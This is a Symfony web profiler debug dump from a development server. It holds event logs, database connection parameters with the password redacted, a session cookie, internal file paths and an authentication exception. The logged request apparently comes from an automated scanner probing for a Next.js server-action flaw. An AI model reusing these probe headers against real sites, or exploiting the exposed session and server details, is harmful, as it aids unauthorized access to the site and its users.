      ]
      [
        "timestamp" => 1765926544
        "timestamp_rfc3339" => "2025-12-17T00:09:04.359+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.response"
          "listener" => "Symfony\Component\WebLink\EventListener\AddLinkHeaderListener::onKernelResponse"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926544
        "timestamp_rfc3339" => "2025-12-17T00:09:04.359+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.response"
          "listener" => "Symfony\Component\HttpKernel\DataCollector\RequestDataCollector::onKernelResponse"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926544
        "timestamp_rfc3339" => "2025-12-17T00:09:04.359+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.response"
          "listener" => "Symfony\Component\HttpKernel\EventListener\CacheAttributeListener::onKernelResponse"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926544
        "timestamp_rfc3339" => "2025-12-17T00:09:04.359+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.response"
          "listener" => "Symfony\Component\HttpKernel\EventListener\ProfilerListener::onKernelResponse"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926544
        "timestamp_rfc3339" => "2025-12-17T00:09:04.359+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.response"
          "listener" => "Symfony\Component\HttpKernel\EventListener\ErrorListener::removeCspHeader"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926544
        "timestamp_rfc3339" => "2025-12-17T00:09:04.359+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.response"
          "listener" => "Symfony\Bundle\WebProfilerBundle\EventListener\WebDebugToolbarListener::onKernelResponse"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926544
        "timestamp_rfc3339" => "2025-12-17T00:09:04.359+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.response"
          "listener" => "Symfony\Component\HttpKernel\EventListener\DisallowRobotsIndexingListener::onResponse"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926544
        "timestamp_rfc3339" => "2025-12-17T00:09:04.359+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.response"
          "listener" => "Symfony\Component\HttpKernel\EventListener\SessionListener::onKernelResponse"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926544
        "timestamp_rfc3339" => "2025-12-17T00:09:04.360+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.finish_request"
          "listener" => "Symfony\Component\HttpKernel\EventListener\LocaleListener::onKernelFinishRequest"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926544
        "timestamp_rfc3339" => "2025-12-17T00:09:04.360+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.finish_request"
          "listener" => "Symfony\Component\HttpKernel\EventListener\RouterListener::onKernelFinishRequest"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926544
        "timestamp_rfc3339" => "2025-12-17T00:09:04.360+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.finish_request"
          "listener" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener::onKernelFinishRequest"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926544
        "timestamp_rfc3339" => "2025-12-17T00:09:04.360+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.finish_request"
          "listener" => "Symfony\Component\HttpKernel\EventListener\LocaleAwareListener::onKernelFinishRequest"
        ]
        "channel" => "event"
      ]
    ]
    265 => [
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.769+01:00"
        "message" => "LocaleListener - onKernelRequest => START"
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => []
        "channel" => "app"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.769+01:00"
        "message" => "AuthorizationListener - onKernelRequest => START"
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => []
        "channel" => "app"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.776+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.request"
          "listener" => "Symfony\Component\HttpKernel\EventListener\DebugHandlersListener::configure"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.776+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.request"
          "listener" => "Symfony\Component\HttpKernel\EventListener\ValidateRequestListener::onKernelRequest"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.776+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.request"
          "listener" => "Symfony\Component\HttpKernel\EventListener\SessionListener::onKernelRequest"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.776+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.request"
          "listener" => "Symfony\Component\HttpKernel\EventListener\LocaleListener::setDefaultLocale"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.776+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.request"
          "listener" => "Symfony\Component\HttpKernel\EventListener\RouterListener::onKernelRequest"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.776+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.request"
          "listener" => "App\EventListener\LocaleListener::onKernelRequest"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.776+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.request"
          "listener" => "Symfony\Component\HttpKernel\EventListener\LocaleListener::onKernelRequest"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.776+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.request"
          "listener" => "Symfony\Component\HttpKernel\EventListener\LocaleAwareListener::onKernelRequest"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.776+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.request"
          "listener" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener::configureLogoutUrlGenerator"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.776+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.request"
          "listener" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener::onKernelRequest"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.776+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.request"
          "listener" => "App\EventListener\AuthorizationListener::onKernelRequest"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.776+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.request"
          "listener" => "App\EventListener\MaintenanceListener::onKernelRequest"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.815+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.controller"
          "listener" => "Symfony\Bundle\FrameworkBundle\DataCollector\RouterDataCollector::onKernelController"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.815+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.controller"
          "listener" => "Symfony\Component\HttpKernel\DataCollector\RequestDataCollector::onKernelController"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.816+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.controller_arguments"
          "listener" => "Symfony\Component\Security\Http\EventListener\IsGrantedAttributeListener::onKernelControllerArguments"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.816+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.controller_arguments"
          "listener" => "Symfony\Component\HttpKernel\EventListener\CacheAttributeListener::onKernelControllerArguments"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.816+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.controller_arguments"
          "listener" => "Container9HhWYUq\RequestPayloadValueResolverGhost3590451::onKernelControllerArguments"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.816+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.controller_arguments"
          "listener" => "Symfony\Component\HttpKernel\EventListener\ErrorListener::onControllerArguments"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.924+01:00"
        "message" => "Connecting with parameters {params}"
        "priority" => 200
        "priorityName" => "INFO"
        "context" => [
          "params" => [
            "driver" => "pdo_mysql"
            "idle_connection_ttl" => 600
            "host" => "127.0.0.1"
            "port" => 3306
            "user" => "2d_saas_dev"
            "password" => "<redacted>"
            "driverOptions" => []
            "defaultTableOptions" => [
              "collation" => "utf8mb4_unicode_ci"
            ]
            "dbname" => "armony_main"
            "serverVersion" => "11.4.4-MariaDB"
            "charset" => "utf8mb4"
          ]
        ]
        "channel" => "doctrine"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.927+01:00"
        "message" => "Executing query: {sql}"
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "sql" => "SELECT DATABASE()"
        ]
        "channel" => "doctrine"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.930+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.response"
          "listener" => "Symfony\Component\Security\Http\Firewall\ContextListener::onKernelResponse"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.930+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.response"
          "listener" => "Symfony\Component\Security\Http\Firewall\ContextListener::onKernelResponse"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.930+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.response"
          "listener" => "Symfony\Component\HttpKernel\EventListener\ResponseListener::onKernelResponse"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.930+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.response"
          "listener" => "Symfony\Component\WebLink\EventListener\AddLinkHeaderListener::onKernelResponse"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.930+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.response"
          "listener" => "Symfony\Component\HttpKernel\DataCollector\RequestDataCollector::onKernelResponse"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.930+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.response"
          "listener" => "Symfony\Component\HttpKernel\EventListener\CacheAttributeListener::onKernelResponse"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.930+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.response"
          "listener" => "Symfony\Component\HttpKernel\EventListener\ProfilerListener::onKernelResponse"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.930+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.response"
          "listener" => "Symfony\Component\HttpKernel\EventListener\ErrorListener::removeCspHeader"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.930+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.response"
          "listener" => "Symfony\Bundle\WebProfilerBundle\EventListener\WebDebugToolbarListener::onKernelResponse"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.930+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.response"
          "listener" => "Symfony\Component\HttpKernel\EventListener\DisallowRobotsIndexingListener::onResponse"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.930+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.response"
          "listener" => "Symfony\Component\HttpKernel\EventListener\SessionListener::onKernelResponse"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.930+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.finish_request"
          "listener" => "Symfony\Component\HttpKernel\EventListener\LocaleListener::onKernelFinishRequest"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.930+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.finish_request"
          "listener" => "Symfony\Component\HttpKernel\EventListener\RouterListener::onKernelFinishRequest"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.930+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.finish_request"
          "listener" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener::onKernelFinishRequest"
        ]
        "channel" => "event"
      ]
      [
        "timestamp" => 1765926543
        "timestamp_rfc3339" => "2025-12-17T00:09:03.930+01:00"
        "message" => "Notified event "{event}" to listener "{listener}"."
        "priority" => 100
        "priorityName" => "DEBUG"
        "context" => [
          "event" => "kernel.finish_request"
          "listener" => "Symfony\Component\HttpKernel\EventListener\LocaleAwareListener::onKernelFinishRequest"
        ]
        "channel" => "event"
      ]
    ]
  ]
  -errorCount: [
    14 => 1
    265 => 0
  ]
  -requestStack: Symfony\Component\HttpKernel\Debug\VirtualRequestStack {#984 …}
}

Request Headers

Header Value
accept
"*/*"
accept-encoding
"gzip, deflate"
connection
"keep-alive"
content-length
"753"
content-type
"multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad"
cookie
"PHPSESSID=7gm1bq8t33k7sh5oobvo7csdj8; sf_redirect=%7B%22token%22%3A%22580dbe%22%2C%22route%22%3A%22index%22%2C%22method%22%3A%22GET%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CDefaultController%22%2C%22method%22%3A%22index%22%2C%22file%22%3A%22%5C%2Fvar%5C%2Fwww%5C%2Fmain-dev.2d-armony.it%5C%2FSymfony%5C%2Fsrc%5C%2FController%5C%2FDefaultController.php%22%2C%22line%22%3A513%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D"
host
"main-dev.2d-armony.it"
next-action
"x"
user-agent
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0"
x-nextjs-html-request-id
"SSTMXm7OJ_g0Ncx6jpQt9"
x-nextjs-request-id
"b5dce965"
x-php-ob-level
"1"

Request Content

Request content not available (it was retrieved as a resource).

Response

Response Headers

Header Value
cache-control
"no-cache, private"
content-type
"text/html; charset=UTF-8"
date
"Tue, 16 Dec 2025 23:09:03 GMT"
vary
"Accept"
x-debug-exception
"Symfony%5CComponent%5CSecurity%5CHttp%5CAuthenticator%5CPassport%5CBadge%5CUserBadge%3A%3A__construct%28%29%3A%20Argument%20%231%20%28%24userIdentifier%29%20must%20be%20of%20type%20string%2C%20null%20given%2C%20called%20in%20%2Fvar%2Fwww%2Fmain-dev.2d-armony.it%2FSymfony%2Fsrc%2FSecurity%2FApp2DSaasAuthenticator.php%20on%20line%2092"
x-debug-exception-file
"%2Fvar%2Fwww%2Fmain-dev.2d-armony.it%2FSymfony%2Fvendor%2Fsymfony%2Fsecurity-http%2FAuthenticator%2FPassport%2FBadge%2FUserBadge.php:52"
x-debug-token
"8b02bc"

Cookies

Request Cookies

Key Value
PHPSESSID
"7gm1bq8t33k7sh5oobvo7csdj8"
sf_redirect
"{"token":"580dbe","route":"index","method":"GET","controller":{"class":"App\\Controller\\DefaultController","method":"index","file":"\/var\/www\/main-dev.2d-armony.it\/Symfony\/src\/Controller\/DefaultController.php","line":513},"status_code":302,"status_text":"Found"}"

Response Cookies

No response cookies

Session 4

Session Metadata

Key Value
Created
"Wed, 17 Dec 25 00:09:00 +0100"
Last used
"Wed, 17 Dec 25 00:09:00 +0100"
Lifetime
7776000

Session Attributes

Attribute Value
lastRequests
[
  [
    "uri" => "https://main-dev.2d-armony.it/"
    "content" => ""
  ]
  [
    "uri" => "https://main-dev.2d-armony.it/login"
    "content" => ""
  ]
  [
    "uri" => "https://main-dev.2d-armony.it/login"
    "content" => ""
  ]
]

Session Usage

4 Usages
Stateless check enabled
Usage
App\EventListener\LocaleListener:41
[
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/src/EventListener/LocaleListener.php"
    "line" => 41
    "function" => "get"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 116
    "function" => "onKernelRequest"
    "class" => "App\EventListener\LocaleListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 220
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 139
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 157
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 76
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/http-kernel/Kernel.php"
    "line" => 197
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/public/index.php"
    "line" => 30
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
]
App\Security\App2DSaasAuthenticator:73
[
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/src/Security/App2DSaasAuthenticator.php"
    "line" => 73
    "function" => "get"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 111
    "function" => "supports"
    "class" => "App\Security\App2DSaasAuthenticator"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
    "line" => 34
    "function" => "supports"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
    "line" => 40
    "function" => "supports"
    "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 38
    "function" => "supports"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Firewall/AbstractListener.php"
    "line" => 25
    "function" => "supports"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 83
    "function" => "__invoke"
    "class" => "Symfony\Component\Security\Http\Firewall\AbstractListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Firewall.php"
    "line" => 95
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 116
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 220
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 139
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 157
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 76
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/http-kernel/Kernel.php"
    "line" => 197
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/public/index.php"
    "line" => 30
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
]
App\Security\App2DSaasAuthenticator:79
[
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/src/Security/App2DSaasAuthenticator.php"
    "line" => 79
    "function" => "set"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 111
    "function" => "supports"
    "class" => "App\Security\App2DSaasAuthenticator"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
    "line" => 34
    "function" => "supports"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
    "line" => 40
    "function" => "supports"
    "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 38
    "function" => "supports"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Firewall/AbstractListener.php"
    "line" => 25
    "function" => "supports"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 83
    "function" => "__invoke"
    "class" => "Symfony\Component\Security\Http\Firewall\AbstractListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/security-http/Firewall.php"
    "line" => 95
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/var/www/main-dev.2d-armony.it/Symfony/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 116
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
